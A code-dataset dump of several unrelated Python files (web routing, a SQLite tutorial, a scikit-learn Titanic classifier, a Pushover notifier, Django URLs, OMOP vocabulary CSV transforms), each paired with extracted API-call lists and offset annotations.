disconnected_for = now - last_activity_time
is_dead = disconnected_for > dead_disconnected_timeout
return not is_dead
if __name__ == '__main__':
main()
|
[
"argparse.ArgumentParser",
"requests.Session",
"time.sleep",
"datetime.datetime.strptime",
"datetime.timedelta",
"datetime.datetime.now",
"logging.getLogger"
] |
[((128, 155), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (145, 155), False, 'import logging\n'), ((184, 204), 'datetime.timedelta', 'timedelta', ([], {'minutes': '(5)'}), '(minutes=5)\n', (193, 204), False, 'from datetime import datetime, timedelta, timezone\n'), ((258, 283), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (281, 283), False, 'import argparse\n'), ((933, 951), 'requests.Session', 'requests.Session', ([], {}), '()\n', (949, 951), False, 'import requests\n'), ((2933, 2996), 'datetime.datetime.strptime', 'datetime.strptime', (["agent['lastActivityTime']", '"""%Y%m%dT%H%M%S%z"""'], {}), "(agent['lastActivityTime'], '%Y%m%dT%H%M%S%z')\n", (2950, 2996), False, 'from datetime import datetime, timedelta, timezone\n'), ((3007, 3033), 'datetime.datetime.now', 'datetime.now', (['timezone.utc'], {}), '(timezone.utc)\n', (3019, 3033), False, 'from datetime import datetime, timedelta, timezone\n'), ((2802, 2837), 'time.sleep', 'time.sleep', (['args.watch_interval_sec'], {}), '(args.watch_interval_sec)\n', (2812, 2837), False, 'import time\n')]
|
import webapp2
import config
import app.handlers.home
ROUTES = []
ROUTES += app.handlers.home.ROUTES
app = webapp2.WSGIApplication(ROUTES, debug=config.DEBUG)
|
[
"webapp2.WSGIApplication"
] |
[((110, 161), 'webapp2.WSGIApplication', 'webapp2.WSGIApplication', (['ROUTES'], {'debug': 'config.DEBUG'}), '(ROUTES, debug=config.DEBUG)\n', (133, 161), False, 'import webapp2\n')]
|
"""
Example code for working with sqlit3 to manage the database.
This file is mostly for Ted but if anyone else needs an example for
understanding the database code, this is a good resource.
Here is the official Python guide as well:
https://docs.python.org/3/library/sqlite3.html
You can also look up sqlit3 tutorials and tons will come up (such as
the one from tutorialspoint).
"""
# This is how you import sqlit3
import sqlite3
# This is the relative filename to the database. Relative file name
# means the path from the current directory. Don't put something like:
# C:\\Users\\blahblahblah\\..., that would be an absolute path.
database_file = "DB_FILENAME.db"
# This command creates the CONNECTED_DATABASE_OBJECT_NAME object from
# the README_FOR_TED file. This object is used to interact with the
# database.
conn = sqlite3.connect(database_file)
# This creates what's called a cursor object which essentially points
# to the database and allows you to execute SQL commands on it. This is
# the "wrapper" for the Python code to interact with SQLite (the database
# management system).
c = conn.cursor()
# These are example variables that can be used in the safe insertion
# logic below.
msg_txt = "What time is it?"
action = "TIME"
# This command is how you execute SQL commands in sqlit3. The example
# command here is inserting data into a table in the database called
# training_data in the columns "txt" and "action". The (?, ?) part
# might look a little scary but all it's actually doing is safely
# inserting whatever is passed into the second argument: a tuple ->
# (msg_txt, action,). This helps to avoid things like SQL injection and
# accidentally altering the wrong things in the database. Notice how the
# tuple has a comma at the end. This is required because otherwise,
# Python would treat it as an operation grouping; so if it were instead
# (msg_txt, action) without the comma at the end, you would get an error
# that can be tricky to spot.
c.execute("INSERT INTO training_data (txt,action) VALUES (?, ?)", (msg_txt, action,))
# This command "commits" the changes and makes them permanent.
conn.commit()
|
[
"sqlite3.connect"
] |
[((864, 894), 'sqlite3.connect', 'sqlite3.connect', (['database_file'], {}), '(database_file)\n', (879, 894), False, 'import sqlite3\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Aug 13 22:37:36 2020
@author: arti
"""
import pandas as pd
df = pd.read_csv('./titanic.csv')
print(df.head())
print('--')
pd.set_option('display.max_columns', 15)
print(df.head())
print('--')
print(df.info())
print('--')
rdf = df.drop(['deck', 'embark_town'], axis = 1)
print(rdf.columns.values)
rdf = rdf.dropna(subset=['age'], how='any', axis=0)
print(len(rdf))
most_freq = rdf['embarked'].value_counts(dropna=True).idxmax()
print(most_freq)
print('--')
print(rdf.describe(include='all'))
print('--')
rdf['embarked'].fillna(most_freq, inplace=True)
ndf = rdf[['survived', 'pclass', 'sex', 'age', 'sibsp', 'parch', 'embarked']]
print(ndf.head())
onehot_sex = pd.get_dummies(ndf['sex'])
ndf = pd.concat([ndf, onehot_sex], axis=1)
onehot_embarked = pd.get_dummies(ndf['embarked'], prefix='town')
ndf = pd.concat([ndf, onehot_embarked], axis=1)
ndf.drop(['sex', 'embarked'], axis=1, inplace=True)
print(ndf.head())
x = ndf[['pclass', 'age', 'sibsp', 'parch', 'female', 'male',
'town_C', 'town_Q', 'town_S']]
y = ndf['survived']
from sklearn import preprocessing
x = preprocessing.StandardScaler().fit(x).transform(x)
from sklearn.model_selection import train_test_split
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3,
random_state=10)
print('train data :', x_train.shape)
print('test data :', x_test.shape)
from sklearn.neighbors import KNeighborsClassifier
knn = KNeighborsClassifier(n_neighbors=5)
knn.fit(x_train, y_train)
y_hat = knn.predict(x_test)
print(y_hat[0:10])
print(y_test.values[0:10])
from sklearn import metrics
knn_matrix = metrics.confusion_matrix(y_test, y_hat)
print(knn_matrix)
knn_report = metrics.classification_report(y_test, y_hat)
print(knn_report)
|
[
"sklearn.preprocessing.StandardScaler",
"pandas.read_csv",
"pandas.get_dummies",
"sklearn.model_selection.train_test_split",
"sklearn.metrics.classification_report",
"sklearn.neighbors.KNeighborsClassifier",
"sklearn.metrics.confusion_matrix",
"pandas.set_option",
"pandas.concat"
] |
[((133, 161), 'pandas.read_csv', 'pd.read_csv', (['"""./titanic.csv"""'], {}), "('./titanic.csv')\n", (144, 161), True, 'import pandas as pd\n'), ((193, 233), 'pandas.set_option', 'pd.set_option', (['"""display.max_columns"""', '(15)'], {}), "('display.max_columns', 15)\n", (206, 233), True, 'import pandas as pd\n'), ((739, 765), 'pandas.get_dummies', 'pd.get_dummies', (["ndf['sex']"], {}), "(ndf['sex'])\n", (753, 765), True, 'import pandas as pd\n'), ((772, 808), 'pandas.concat', 'pd.concat', (['[ndf, onehot_sex]'], {'axis': '(1)'}), '([ndf, onehot_sex], axis=1)\n', (781, 808), True, 'import pandas as pd\n'), ((828, 874), 'pandas.get_dummies', 'pd.get_dummies', (["ndf['embarked']"], {'prefix': '"""town"""'}), "(ndf['embarked'], prefix='town')\n", (842, 874), True, 'import pandas as pd\n'), ((881, 922), 'pandas.concat', 'pd.concat', (['[ndf, onehot_embarked]'], {'axis': '(1)'}), '([ndf, onehot_embarked], axis=1)\n', (890, 922), True, 'import pandas as pd\n'), ((1296, 1350), 'sklearn.model_selection.train_test_split', 'train_test_split', (['x', 'y'], {'test_size': '(0.3)', 'random_state': '(10)'}), '(x, y, test_size=0.3, random_state=10)\n', (1312, 1350), False, 'from sklearn.model_selection import train_test_split\n'), ((1535, 1570), 'sklearn.neighbors.KNeighborsClassifier', 'KNeighborsClassifier', ([], {'n_neighbors': '(5)'}), '(n_neighbors=5)\n', (1555, 1570), False, 'from sklearn.neighbors import KNeighborsClassifier\n'), ((1715, 1754), 'sklearn.metrics.confusion_matrix', 'metrics.confusion_matrix', (['y_test', 'y_hat'], {}), '(y_test, y_hat)\n', (1739, 1754), False, 'from sklearn import metrics\n'), ((1787, 1831), 'sklearn.metrics.classification_report', 'metrics.classification_report', (['y_test', 'y_hat'], {}), '(y_test, y_hat)\n', (1816, 1831), False, 'from sklearn import metrics\n'), ((1156, 1186), 'sklearn.preprocessing.StandardScaler', 'preprocessing.StandardScaler', ([], {}), '()\n', (1184, 1186), False, 'from sklearn import preprocessing\n')]
|
import os
import argparse
import requests
def main():
parser = argparse.ArgumentParser(description="Pushover Notifications")
parser.add_argument('--message',
type=str,
help='Message text')
parser.add_argument('--status',
type=str,
help='The current status of the job')
parser.add_argument('--title',
type=str,
help='Message title')
parser.add_argument('--url',
type=str,
help='Supplementary URL to show with your message')
parser.add_argument('--url_title',
type=str,
help='title for your supplementary URL, otherwise just the URL is shown')
parser.add_argument('--device',
type=str,
help='Device name to send the message directly to')
args = parser.parse_args()
try:
token = os.environ['PUSHOVER_TOKEN']
user = os.environ['PUSHOVER_USER']
gh_server_url = os.environ['GITHUB_SERVER_URL']
gh_repo = os.environ['GITHUB_REPOSITORY']
gh_run_id = os.environ['GITHUB_RUN_ID']
gh_actor = os.environ['GITHUB_ACTOR']
gh_job = os.environ['GITHUB_JOB']
repo = 'Repo: ' + gh_repo
sha = 'Commit: ' + os.environ['GITHUB_SHA'][:8]
ref = 'Ref: ' + os.environ['GITHUB_REF'] if 'GITHUB_REF' in os.environ else ''
actor = 'Actor: ' + gh_actor
job = 'Job: ' + gh_job
workflow_url = 'Url: ' + gh_server_url + '/' + gh_repo + '/' + 'actions' + '/' + 'runs' + '/' + gh_run_id
status = 'Status: ' + args.status if args.status else ''
message = args.message if args.message else ''
message = '\n'.join([m for m in [repo, actor, sha, ref, status, job, workflow_url, message] if m])
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
payload = {
'token' : token,
'user' : user,
'message' : message,
'title' : args.title,
'url' : args.url,
'url_title' : args.url_title,
'device' : args.device,
}
response = requests.post('https://api.pushover.net/1/messages.json',
headers=headers,
data=payload,
timeout=60)
response.raise_for_status()
print(response.text)
except requests.exceptions.RequestException as e:
raise e
if __name__ == '__main__':
main()
|
[
"requests.post",
"argparse.ArgumentParser"
] |
[((69, 130), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Pushover Notifications"""'}), "(description='Pushover Notifications')\n", (92, 130), False, 'import argparse\n'), ((2340, 2444), 'requests.post', 'requests.post', (['"""https://api.pushover.net/1/messages.json"""'], {'headers': 'headers', 'data': 'payload', 'timeout': '(60)'}), "('https://api.pushover.net/1/messages.json', headers=headers,\n data=payload, timeout=60)\n", (2353, 2444), False, 'import requests\n')]
|
# -*- coding: utf-8 -*-
#
# Unless explicitly stated otherwise all files in this repository are licensed
# under the Apache 2 License.
#
# This product includes software developed at Datadog
# (https://www.datadoghq.com/).
#
# Copyright 2018 Datadog, Inc.
#
from app import db
from app.services import SubscribedListService
from app.models import SubscribedList
from tests.base_test_case import BaseTestCase
from tests.utils import create_board, create_repo, create_list, \
create_subscription, default_board_id, default_repo_id, default_list_id
class SubscribedListServiceTestCase(BaseTestCase):
"""Tests the `SubscribedListService` service."""
def setUp(self):
"""Sets up testing context."""
super().setUp()
self.subscribed_list_service = SubscribedListService()
create_board()
create_repo()
create_list()
create_subscription()
db.session.commit()
def test_create(self):
"""Test that an subscribed_list is successfully created."""
subscribed_lists = SubscribedList.query.all()
self.assertTrue(len(subscribed_lists) is 0)
# Create the subscribed_list
self.subscribed_list_service.create(
board_id=default_board_id,
repo_id=default_repo_id,
list_id=default_list_id,
)
new_subscribed_lists = SubscribedList.query.all()
self.assertTrue(len(new_subscribed_lists) is 1)
def test_update(self):
"""Test that a subscribed_list is successfully updated."""
self.test_create()
primary_key = [default_board_id, default_repo_id, default_list_id]
subscribed_list = SubscribedList.query.get(primary_key)
self.assertTrue(subscribed_list.trello_member_id is None)
new_member_id = '<PASSWORD>uuid'
self.subscribed_list_service.update(
board_id=default_board_id,
repo_id=default_repo_id,
list_id=default_list_id,
trello_member_id=new_member_id
)
updated_list = SubscribedList.query.get(primary_key)
self.assertTrue(updated_list.trello_member_id == new_member_id)
def test_delete(self):
"""Test that an subscribed_list is successfully deleted."""
self.test_create()
subscribed_lists = SubscribedList.query.all()
self.assertTrue(len(subscribed_lists) is 1)
# Delete the subscribed_list
self.subscribed_list_service.delete(
board_id=default_board_id,
repo_id=default_repo_id,
list_id=default_list_id
)
new_subscribed_lists = SubscribedList.query.all()
self.assertTrue(len(new_subscribed_lists) is 0)
|
[
"tests.utils.create_board",
"app.models.SubscribedList.query.get",
"tests.utils.create_repo",
"app.services.SubscribedListService",
"app.db.session.commit",
"tests.utils.create_list",
"tests.utils.create_subscription",
"app.models.SubscribedList.query.all"
] |
[((782, 805), 'app.services.SubscribedListService', 'SubscribedListService', ([], {}), '()\n', (803, 805), False, 'from app.services import SubscribedListService\n'), ((814, 828), 'tests.utils.create_board', 'create_board', ([], {}), '()\n', (826, 828), False, 'from tests.utils import create_board, create_repo, create_list, create_subscription, default_board_id, default_repo_id, default_list_id\n'), ((837, 850), 'tests.utils.create_repo', 'create_repo', ([], {}), '()\n', (848, 850), False, 'from tests.utils import create_board, create_repo, create_list, create_subscription, default_board_id, default_repo_id, default_list_id\n'), ((859, 872), 'tests.utils.create_list', 'create_list', ([], {}), '()\n', (870, 872), False, 'from tests.utils import create_board, create_repo, create_list, create_subscription, default_board_id, default_repo_id, default_list_id\n'), ((881, 902), 'tests.utils.create_subscription', 'create_subscription', ([], {}), '()\n', (900, 902), False, 'from tests.utils import create_board, create_repo, create_list, create_subscription, default_board_id, default_repo_id, default_list_id\n'), ((911, 930), 'app.db.session.commit', 'db.session.commit', ([], {}), '()\n', (928, 930), False, 'from app import db\n'), ((1054, 1080), 'app.models.SubscribedList.query.all', 'SubscribedList.query.all', ([], {}), '()\n', (1078, 1080), False, 'from app.models import SubscribedList\n'), ((1371, 1397), 'app.models.SubscribedList.query.all', 'SubscribedList.query.all', ([], {}), '()\n', (1395, 1397), False, 'from app.models import SubscribedList\n'), ((1679, 1716), 'app.models.SubscribedList.query.get', 'SubscribedList.query.get', (['primary_key'], {}), '(primary_key)\n', (1703, 1716), False, 'from app.models import SubscribedList\n'), ((2060, 2097), 'app.models.SubscribedList.query.get', 'SubscribedList.query.get', (['primary_key'], {}), '(primary_key)\n', (2084, 2097), False, 'from app.models import SubscribedList\n'), ((2321, 2347), 'app.models.SubscribedList.query.all', 'SubscribedList.query.all', ([], {}), '()\n', (2345, 2347), False, 'from app.models import SubscribedList\n'), ((2637, 2663), 'app.models.SubscribedList.query.all', 'SubscribedList.query.all', ([], {}), '()\n', (2661, 2663), False, 'from app.models import SubscribedList\n')]
|
from django.conf.urls import include, url
from django.contrib import admin
from rest_framework import routers
from api import views as v
router = routers.DefaultRouter()
router.register(r'conf', v.ConfViewSet)
router.register(r'country', v.CountryViewSet)
router.register(r'db', v.DbViewSet)
router.register(r'install', v.InstallViewSet)
router.register(r'ip', v.IpViewSet)
router.register(r'project', v.ProjectViewSet)
router.register(r'provider', v.ProviderViewSet)
router.register(r'server', v.ServerViewSet)
router.register(r'user', v.UserViewSet)
admin.site.site_header = 'Control Panel'
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^api/', include(router.urls)),
url(r'^api/postfix/(?P<server_id>\d+)/$', v.PostfixItem.as_view()),
url(r'^api/project-list/(?P<type>.+)/$', v.ProjectListByType.as_view()),
url(r'^api/project-by-name/(?P<name>.+)/$', v.ProjectByName.as_view()),
url(r'^api/server-conf/(?P<server_id>\d+)/$', v.ServerConfList.as_view()),
url(
r'^api/server-conf/(?P<server_id>\d+)/(?P<item>.+)/(?P<filename>.+)/$',
v.ServerConfItem.as_view()
),
url(
r'^api/project-conf/(?P<project_id>\d+)/(?P<item>.+)/$',
v.ProjectConfListByItem.as_view()
),
# settings
url(r'^api/local-linux-username/$', v.LocalLinuxUsername.as_view()),
url(r'^api/local-bash-dir/$', v.LocalBashDir.as_view()),
url(r'^api/confirmation-password/$', v.ConfirmationPassword.as_view()),
url(r'^api/server-control-script/$', v.ServerControlScript.as_view()),
url(r'^$', v.home)
]
|
[
"api.views.ProjectListByType.as_view",
"api.views.ConfirmationPassword.as_view",
"django.conf.urls.include",
"api.views.PostfixItem.as_view",
"api.views.ServerConfItem.as_view",
"api.views.LocalLinuxUsername.as_view",
"api.views.LocalBashDir.as_view",
"api.views.ProjectByName.as_view",
"django.conf.urls.url",
"api.views.ServerControlScript.as_view",
"api.views.ProjectConfListByItem.as_view",
"api.views.ServerConfList.as_view",
"rest_framework.routers.DefaultRouter"
] |
[((148, 171), 'rest_framework.routers.DefaultRouter', 'routers.DefaultRouter', ([], {}), '()\n', (169, 171), False, 'from rest_framework import routers\n'), ((1568, 1585), 'django.conf.urls.url', 'url', (['"""^$"""', 'v.home'], {}), "('^$', v.home)\n", (1571, 1585), False, 'from django.conf.urls import include, url\n'), ((634, 658), 'django.conf.urls.include', 'include', (['admin.site.urls'], {}), '(admin.site.urls)\n', (641, 658), False, 'from django.conf.urls import include, url\n'), ((679, 699), 'django.conf.urls.include', 'include', (['router.urls'], {}), '(router.urls)\n', (686, 699), False, 'from django.conf.urls import include, url\n'), ((749, 772), 'api.views.PostfixItem.as_view', 'v.PostfixItem.as_view', ([], {}), '()\n', (770, 772), True, 'from api import views as v\n'), ((820, 849), 'api.views.ProjectListByType.as_view', 'v.ProjectListByType.as_view', ([], {}), '()\n', (847, 849), True, 'from api import views as v\n'), ((900, 925), 'api.views.ProjectByName.as_view', 'v.ProjectByName.as_view', ([], {}), '()\n', (923, 925), True, 'from api import views as v\n'), ((978, 1004), 'api.views.ServerConfList.as_view', 'v.ServerConfList.as_view', ([], {}), '()\n', (1002, 1004), True, 'from api import views as v\n'), ((1104, 1130), 'api.views.ServerConfItem.as_view', 'v.ServerConfItem.as_view', ([], {}), '()\n', (1128, 1130), True, 'from api import views as v\n'), ((1221, 1254), 'api.views.ProjectConfListByItem.as_view', 'v.ProjectConfListByItem.as_view', ([], {}), '()\n', (1252, 1254), True, 'from api import views as v\n'), ((1318, 1348), 'api.views.LocalLinuxUsername.as_view', 'v.LocalLinuxUsername.as_view', ([], {}), '()\n', (1346, 1348), True, 'from api import views as v\n'), ((1385, 1409), 'api.views.LocalBashDir.as_view', 'v.LocalBashDir.as_view', ([], {}), '()\n', (1407, 1409), True, 'from api import views as v\n'), ((1453, 1485), 'api.views.ConfirmationPassword.as_view', 'v.ConfirmationPassword.as_view', ([], {}), '()\n', (1483, 1485), True, 'from api import views as v\n'), ((1529, 1560), 'api.views.ServerControlScript.as_view', 'v.ServerControlScript.as_view', ([], {}), '()\n', (1558, 1560), True, 'from api import views as v\n')]
|
"""
.. module:: tests
:synopsis: tests of core siMpLify entitys
:author: <NAME>
:copyright: 2019-2020
:license: Apache-2.0
"""
import os
import sys
sys.path.insert(0, os.path.join('..', 'simplify'))
sys.path.insert(0, os.path.join('..', '..', 'simplify'))
import simplify.content as content
algorithm, parameters = content.create(
configuration = {'general': {'gpu': True, 'seed': 4}},
package = 'analyst',
step = 'scale',
step = 'normalize',
parameters = {'copy': False})
print(algorithm, parameters)
|
[
"simplify.content.create",
"os.path.join"
] |
[((318, 469), 'simplify.content.create', 'content.create', ([], {'configuration': "{'general': {'gpu': True, 'seed': 4}}", 'package': '"""analyst"""', 'step': '"""normalize"""', 'parameters': "{'copy': False}"}), "(configuration={'general': {'gpu': True, 'seed': 4}}, package\n ='analyst', step='scale', step='normalize', parameters={'copy': False})\n", (332, 469), True, 'import simplify.content as content\n'), ((168, 198), 'os.path.join', 'os.path.join', (['""".."""', '"""simplify"""'], {}), "('..', 'simplify')\n", (180, 198), False, 'import os\n'), ((219, 255), 'os.path.join', 'os.path.join', (['""".."""', '""".."""', '"""simplify"""'], {}), "('..', '..', 'simplify')\n", (231, 255), False, 'import os\n')]
|
import csv
import logging
import os
import sys
import warnings
import re
from common import CONCEPT, VOCABULARY, DELIMITER, LINE_TERMINATOR, TRANSFORM_FILES, \
APPEND_VOCABULARY, APPEND_CONCEPTS, ADD_AOU_GENERAL, ERRORS, AOU_GEN_ID, AOU_GEN_VOCABULARY_CONCEPT_ID, \
AOU_GEN_VOCABULARY_REFERENCE, ERROR_APPENDING, AOU_GEN_NAME
from resources import AOU_GENERAL_PATH, AOU_GENERAL_CONCEPT_CSV_PATH, hash_dir
from io import open
RAW_DATE_PATTERN = re.compile(r'\d{8}$')
BQ_DATE_PATTERN = re.compile(r'\d{4}-\d{2}-\d{2}$')
csv.field_size_limit(sys.maxsize)
def format_date_str(date_str):
"""
Format a date string to yyyymmdd if it is not already
:param date_str: the date string
:return: the formatted date string
:raises: ValueError if a valid date object cannot be parsed from the string
"""
if BQ_DATE_PATTERN.match(date_str):
formatted_date_str = date_str
elif RAW_DATE_PATTERN.match(date_str):
parts = date_str[0:4], date_str[4:6], date_str[6:8]
formatted_date_str = '-'.join(parts)
else:
raise ValueError('Cannot parse value {v} as date'.format(v=date_str))
return formatted_date_str
def _transform_csv(in_fp, out_fp, err_fp=None):
if not err_fp:
err_fp = sys.stderr
csv_reader = csv.reader(in_fp, delimiter=DELIMITER)
header = next(csv_reader)
date_indexes = []
for index, item in enumerate(header):
if item.endswith('_date'):
date_indexes.append(index)
csv_writer = csv.writer(out_fp, delimiter=DELIMITER, lineterminator=LINE_TERMINATOR)
csv_writer.writerow(header)
for row in csv_reader:
try:
for i in date_indexes:
row[i] = format_date_str(row[i])
csv_writer.writerow(row)
except (ValueError, IndexError) as e:
message = 'Error %s transforming row:\n%s' % (e.message, row)
err_fp.write(message)
def transform_file(file_path, out_dir):
"""
Format file date fields and standardize line endings a local csv file and save result in specified directory
:param file_path: Path to the csv file
:param out_dir: Directory to save the transformed file
"""
file_name = os.path.basename(file_path)
out_file_name = os.path.join(out_dir, file_name)
err_dir = os.path.join(out_dir, ERRORS)
err_file_name = os.path.join(err_dir, file_name)
try:
os.makedirs(err_dir)
except OSError:
logging.info("Error directory:\t%s\t already exists", err_dir)
with open(file_path, 'r') as in_fp, open(out_file_name, 'w') as out_fp, open(err_file_name, 'w') as err_fp:
_transform_csv(in_fp, out_fp, err_fp)
def transform_files(in_dir, out_dir):
"""
Transform vocabulary files in a directory and save result in another directory
:param in_dir: Directory containing vocabulary csv files
:param out_dir: Directory to save the transformed file
"""
fs = os.listdir(in_dir)
for f in fs:
in_path = os.path.join(in_dir, f)
transform_file(in_path, out_dir)
def get_aou_general_version():
return hash_dir(AOU_GENERAL_PATH)
def get_aou_general_vocabulary_row():
aou_gen_version = get_aou_general_version()
# vocabulary_id vocabulary_name vocabulary_reference vocabulary_version vocabulary_concept_id
return DELIMITER.join([AOU_GEN_ID, AOU_GEN_NAME, AOU_GEN_VOCABULARY_REFERENCE, aou_gen_version,
AOU_GEN_VOCABULARY_CONCEPT_ID])
def append_concepts(in_path, out_path):
with open(out_path, 'w') as out_fp:
# copy original rows line by line for memory efficiency
with open(in_path, 'r') as in_fp:
for row in in_fp:
if AOU_GEN_ID in row:
# skip it so it is appended below
warnings.warn(ERROR_APPENDING.format(in_path=in_path))
else:
out_fp.write(row)
# append new rows
with open(AOU_GENERAL_CONCEPT_CSV_PATH, 'r') as aou_gen_fp:
# Sending the first five lines of the file because tab delimiters
# are causing trouble with the Sniffer and has_header method
five_lines = ''
for _ in range(0, 5):
five_lines += aou_gen_fp.readline()
has_header = csv.Sniffer().has_header(five_lines)
aou_gen_fp.seek(0)
# skip header if present
if has_header:
next(aou_gen_fp)
for row in aou_gen_fp:
out_fp.write(row)
def append_vocabulary(in_path, out_path):
new_row = get_aou_general_vocabulary_row()
with open(out_path, 'w') as out_fp:
# copy original rows line by line for memory efficiency
with open(in_path, 'r') as in_fp:
for row in in_fp:
if AOU_GEN_ID in row:
# skip it so it is appended below
warnings.warn(ERROR_APPENDING.format(in_path=in_path))
else:
out_fp.write(row)
# append new row
out_fp.write(new_row)
def add_aou_general(in_dir, out_dir):
file_names = os.listdir(in_dir)
concept_in_path = None
vocabulary_in_path = None
# Case-insensitive search for concept and vocabulary files
for file_name in file_names:
table_name, _ = os.path.splitext(file_name.lower())
in_path = os.path.join(in_dir, file_name)
if table_name == CONCEPT:
concept_in_path = in_path
elif table_name == VOCABULARY:
vocabulary_in_path = in_path
if concept_in_path is None:
raise IOError('CONCEPT.csv was not found in %s' % in_dir)
if vocabulary_in_path is None:
raise IOError('VOCABULARY.csv was not found in %s' % in_dir)
concept_out_path = os.path.join(out_dir, os.path.basename(concept_in_path))
append_concepts(concept_in_path, concept_out_path)
vocabulary_out_path = os.path.join(out_dir, os.path.basename(vocabulary_in_path))
append_vocabulary(vocabulary_in_path, vocabulary_out_path)
if __name__ == '__main__':
import argparse
arg_parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter)
arg_parser.add_argument('command', choices=[TRANSFORM_FILES, ADD_AOU_GENERAL, APPEND_VOCABULARY, APPEND_CONCEPTS])
arg_parser.add_argument('--in_dir', required=True)
arg_parser.add_argument('--out_dir', required=True)
args = arg_parser.parse_args()
if args.command == TRANSFORM_FILES:
transform_files(args.in_dir, args.out_dir)
elif args.command == ADD_AOU_GENERAL:
add_aou_general(args.in_dir, args.out_dir)
elif args.command == APPEND_VOCABULARY:
append_vocabulary(args.file, args.out_dir)
elif args.command == APPEND_CONCEPTS:
append_concepts(args.file, args.out_dir)
|
[
"common.ERROR_APPENDING.format",
"resources.hash_dir",
"csv.reader",
"csv.writer",
"argparse.ArgumentParser",
"os.path.basename",
"os.makedirs",
"common.DELIMITER.join",
"csv.field_size_limit",
"csv.Sniffer",
"logging.info",
"io.open",
"os.path.join",
"os.listdir",
"re.compile"
] |
[((454, 475), 're.compile', 're.compile', (['"""\\\\d{8}$"""'], {}), "('\\\\d{8}$')\n", (464, 475), False, 'import re\n'), ((494, 529), 're.compile', 're.compile', (['"""\\\\d{4}-\\\\d{2}-\\\\d{2}$"""'], {}), "('\\\\d{4}-\\\\d{2}-\\\\d{2}$')\n", (504, 529), False, 'import re\n'), ((529, 562), 'csv.field_size_limit', 'csv.field_size_limit', (['sys.maxsize'], {}), '(sys.maxsize)\n', (549, 562), False, 'import csv\n'), ((1285, 1323), 'csv.reader', 'csv.reader', (['in_fp'], {'delimiter': 'DELIMITER'}), '(in_fp, delimiter=DELIMITER)\n', (1295, 1323), False, 'import csv\n'), ((1509, 1580), 'csv.writer', 'csv.writer', (['out_fp'], {'delimiter': 'DELIMITER', 'lineterminator': 'LINE_TERMINATOR'}), '(out_fp, delimiter=DELIMITER, lineterminator=LINE_TERMINATOR)\n', (1519, 1580), False, 'import csv\n'), ((2218, 2245), 'os.path.basename', 'os.path.basename', (['file_path'], {}), '(file_path)\n', (2234, 2245), False, 'import os\n'), ((2266, 2298), 'os.path.join', 'os.path.join', (['out_dir', 'file_name'], {}), '(out_dir, file_name)\n', (2278, 2298), False, 'import os\n'), ((2313, 2342), 'os.path.join', 'os.path.join', (['out_dir', 'ERRORS'], {}), '(out_dir, ERRORS)\n', (2325, 2342), False, 'import os\n'), ((2363, 2395), 'os.path.join', 'os.path.join', (['err_dir', 'file_name'], {}), '(err_dir, file_name)\n', (2375, 2395), False, 'import os\n'), ((2954, 2972), 'os.listdir', 'os.listdir', (['in_dir'], {}), '(in_dir)\n', (2964, 2972), False, 'import os\n'), ((3117, 3143), 'resources.hash_dir', 'hash_dir', (['AOU_GENERAL_PATH'], {}), '(AOU_GENERAL_PATH)\n', (3125, 3143), False, 'from resources import AOU_GENERAL_PATH, AOU_GENERAL_CONCEPT_CSV_PATH, hash_dir\n'), ((3341, 3465), 'common.DELIMITER.join', 'DELIMITER.join', (['[AOU_GEN_ID, AOU_GEN_NAME, AOU_GEN_VOCABULARY_REFERENCE, aou_gen_version,\n AOU_GEN_VOCABULARY_CONCEPT_ID]'], {}), '([AOU_GEN_ID, AOU_GEN_NAME, AOU_GEN_VOCABULARY_REFERENCE,\n aou_gen_version, AOU_GEN_VOCABULARY_CONCEPT_ID])\n', (3355, 3465), False, 'from common import CONCEPT, VOCABULARY, DELIMITER, LINE_TERMINATOR, TRANSFORM_FILES, APPEND_VOCABULARY, APPEND_CONCEPTS, ADD_AOU_GENERAL, ERRORS, AOU_GEN_ID, AOU_GEN_VOCABULARY_CONCEPT_ID, AOU_GEN_VOCABULARY_REFERENCE, ERROR_APPENDING, AOU_GEN_NAME\n'), ((5160, 5178), 'os.listdir', 'os.listdir', (['in_dir'], {}), '(in_dir)\n', (5170, 5178), False, 'import os\n'), ((6149, 6226), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'formatter_class': 'argparse.RawDescriptionHelpFormatter'}), '(formatter_class=argparse.RawDescriptionHelpFormatter)\n', (6172, 6226), False, 'import argparse\n'), ((2414, 2434), 'os.makedirs', 'os.makedirs', (['err_dir'], {}), '(err_dir)\n', (2425, 2434), False, 'import os\n'), ((2536, 2556), 'io.open', 'open', (['file_path', '"""r"""'], {}), "(file_path, 'r')\n", (2540, 2556), False, 'from io import open\n'), ((2567, 2591), 'io.open', 'open', (['out_file_name', '"""w"""'], {}), "(out_file_name, 'w')\n", (2571, 2591), False, 'from io import open\n'), ((2603, 2627), 'io.open', 'open', (['err_file_name', '"""w"""'], {}), "(err_file_name, 'w')\n", (2607, 2627), False, 'from io import open\n'), ((3008, 3031), 'os.path.join', 'os.path.join', (['in_dir', 'f'], {}), '(in_dir, f)\n', (3020, 3031), False, 'import os\n'), ((3540, 3559), 'io.open', 'open', (['out_path', '"""w"""'], {}), "(out_path, 'w')\n", (3544, 3559), False, 'from io import open\n'), ((4654, 4673), 'io.open', 'open', (['out_path', '"""w"""'], {}), "(out_path, 'w')\n", (4658, 4673), False, 'from io import open\n'), ((5410, 5441), 'os.path.join', 'os.path.join', (['in_dir', 'file_name'], {}), '(in_dir, file_name)\n', (5422, 5441), False, 'import os\n'), ((5842, 5875), 'os.path.basename', 'os.path.basename', (['concept_in_path'], {}), '(concept_in_path)\n', (5858, 5875), False, 'import os\n'), ((5981, 6017), 'os.path.basename', 'os.path.basename', (['vocabulary_in_path'], {}), '(vocabulary_in_path)\n', (5997, 6017), False, 'import os\n'), ((2463, 2525), 'logging.info', 'logging.info', (['"""Error directory:\t%s\t already exists"""', 'err_dir'], {}), "('Error directory:\\t%s\\t already exists', err_dir)\n", (2475, 2525), False, 'import logging\n'), ((3648, 3666), 'io.open', 'open', (['in_path', '"""r"""'], {}), "(in_path, 'r')\n", (3652, 3666), False, 'from io import open\n'), ((3974, 4013), 